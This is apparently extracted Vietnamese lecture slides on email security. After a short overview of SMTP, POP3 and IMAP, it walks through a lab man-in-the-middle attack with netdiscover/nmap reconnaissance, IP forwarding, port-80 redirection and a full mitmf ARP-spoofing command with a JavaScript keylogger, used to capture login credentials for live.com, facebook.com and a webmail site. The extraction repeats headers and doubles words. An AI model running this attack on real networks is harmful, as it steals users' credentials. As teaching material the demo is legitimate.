Giảng viên: Nguyễn Phát Tài –
EMAIL HACKING AND SECURITY
Giới thiệu về dịch vụ Thư điện tử (Electronic Mail):
❑ Mail Server: Dùng để lưu trữ mail và phát mail.
▪
▪
▪
Mail Server 1
Mail Server 2
Mail Server N
SMTP Server
SMTP Server
SMTP Server
POP3/IMAP4Server
POP3/IMAP4 Server
POP3/IMAP4 Server
Email Client
Email Client
Email Client
SMTP: Simple Mail Transfer Protocol
POP3: Post Office Protocol v.3
IMAP4: Internet Message Access Protocol v.4
EMAIL HACKING AND SECURITY
▪
Mail Client: Chương trình dùng để gửi thư điện tử dành cho các máy trạm.
•
Windows Live Mail
•
Microsoft Outlook
•
Web Mail
EMAIL HACKING AND SECURITY
5. Man In The Middle Hacking:
EMAIL HACKING AND SECURITY
EMAIL HACKING AND SECURITY
EMAIL HACKING AND SECURITY
EMAIL HACKING AND SECURITY
EMAIL HACKING AND SECURITY
EMAIL HACKING AND SECURITY
EMAIL HACKING AND SECURITY
DEMO1: Kỹ thuật tấn công lấy cắp tài khoản Email:
Thực
Thực hiện
hiện trên
trên máy
máy Hacker:
Hacker:
B1: Mở Kali Linux -> chạy chương trình Terminal -> thực hiện lệnh route -n để tìm địa chỉ Router.
EMAIL HACKING AND SECURITY
B2: Thực hiện lệnh netdiscover -r 192.168.1.0/24 để dò tìm các máy nạn nhân (Victim cần tấn công).
EMAIL HACKING AND SECURITY
Tương tự: Có thể thực hiện lệnh nmap -sP 192.168.1.0/24 để dò tìm các máy nạn nhân (Victim cần tấn
công).
EMAIL HACKING AND SECURITY
B3: Thực hiện lệnh cho phép chuyển tiếp các gói tin của máy Victim qua máy Hacker
echo "1" > /proc/sys/net/ipv4/ip_forward
EMAIL HACKING AND SECURITY
B4: Thực hiện lệnh thêm tất cả các gói tin chạy trên port 80 của máy Victim chuyển qua port 4444 của máy
Hacker.
EMAIL HACKING AND SECURITY
B5: Thực hiện lệnh mitmf --help để xem trợ giúp của lệnh tấn công Man In The Middle.
EMAIL HACKING AND SECURITY
B6: Thực hiện lệnh tấn công máy Victim.
mitmf -i eth0 -l 4444 --arp --spoof --targets 192.168.1.12 --gateway 192.168.1.1 --jskeylogger --hsts --hta
EMAIL HACKING AND SECURITY
Thực
Thực hiện
hiện trên
trên máy
máy Victim:
Victim:
B7: Mở chương trình duyệt Firefox hay Cốc Cốc, Chrome, IE -> truy cập vào các trang web có phần đăng
nhập.
Ví dụ: live.com
EMAIL HACKING AND SECURITY
Thực
Thực hiện
hiện trên
trên máy
máy Hacker:
Hacker:
B8: Quay về cửa sổ Terminal của Hacker -> kiểm tra thông tin đăng nhập đã nghe lén & ghi lại được từ bàn
phím của máy Victim.
EMAIL HACKING AND SECURITY
Thực
Thực hiện
hiện trên
trên máy
máy Victim:
Victim:
B9. Mở chương trình duyệt IE 7,8,9,10 -> truy cập vào các trang web có phần đăng nhập.
Ví dụ: facebook.com
EMAIL HACKING AND SECURITY
Thực
Thực hiện
hiện trên
trên máy
máy Hacker:
Hacker:
B10: Quay về cửa sổ Terminal của Hacker -> kiểm tra thông tin đăng nhập đã nghe lén & ghi lại được từ bàn
phím của máy Victim.
EMAIL HACKING AND SECURITY
Thực
Thực hiện
hiện trên
trên máy
máy Victim:
Victim:
B11. Mở chương trình duyệt Chrome/Firefox-> thử truy cập vào Webmail mail.disico.edu.vn
EMAIL HACKING AND SECURITY
Thực
Thực hiện
hiện trên
trên máy
máy Hacker:
Hacker:
B12: Quay về cửa sổ Terminal của Hacker -> kiểm tra thông tin đăng nhập đã nghe lén & ghi lại được từ bàn
phím của máy Victim.